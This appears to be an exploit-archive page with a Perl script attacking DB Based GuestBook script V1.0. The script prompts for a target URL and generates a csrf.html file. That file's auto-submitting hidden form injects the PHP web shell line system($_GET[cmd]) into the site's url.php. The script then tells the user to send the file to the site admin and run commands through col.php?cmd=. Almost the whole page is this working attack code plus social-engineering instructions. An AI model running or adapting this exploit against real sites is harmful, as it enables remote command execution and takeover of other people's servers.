facebook facebook twitter rss

DB Based GuestBook script V1.0 - Csrf inject php code (Perl)

Author: AtT4CKxT3rR0r1ST , Published: 21-01-2014
#!/usr/bin/perl
########################################################################
# Title : DB Based GuestBook script V1.0 - Csrf inject php code
# Author : AtT4CKxT3rR0r1ST
# Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
# Home : http://www.iphobos.com/blog/
# Script : www.hscripts.com/scripts/php/downloads/HGB.zip
# Version : 1.0
# Vulnerability url.php
use LWP::UserAgent;
use LWP::Simple;
system("cls");
print "|----------------------------------------------------|\n";
print "|DB Based GuestBook script v1.0- Csrf inject php code|\n";
print "| Coded by : AtT4CKxT3rR0r1ST |\n";
print "| GREATS TO MY LOVE |\n";
print "|----------------------------------------------------|\n";
sleep(2);
print "\nInsert Target:";
$h = <STDIN>;
chomp $h;
$html = '<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="'.$h.'/url.php">
<input type="hidden" name="Box" value=" ";system($_GET[cmd]);echo"cmd"/>
<input type="hidden" name="Body" value=""/>
<input type="hidden" name="Font" value=""/>
<input type="hidden" name="Odd" value=""/>
<input type="hidden" name="Even" value=""/>
<input type="hidden" name="var" value=""/>
<input type="hidden" name="what" value="write"/>
<input type="submit" value="Submit form"/>
</form>
</body>
</html>';
sleep(1);
print "Createing Done ...\n";
open(XSS , '>>csrf.html');
print XSS $html;
close(XSS);
print "Now Send csrf.html To Admin \n";
sleep(1);
print "To Exploit [http://site/col.php?cmd= COMMAND] \n";

Like us on Facebook :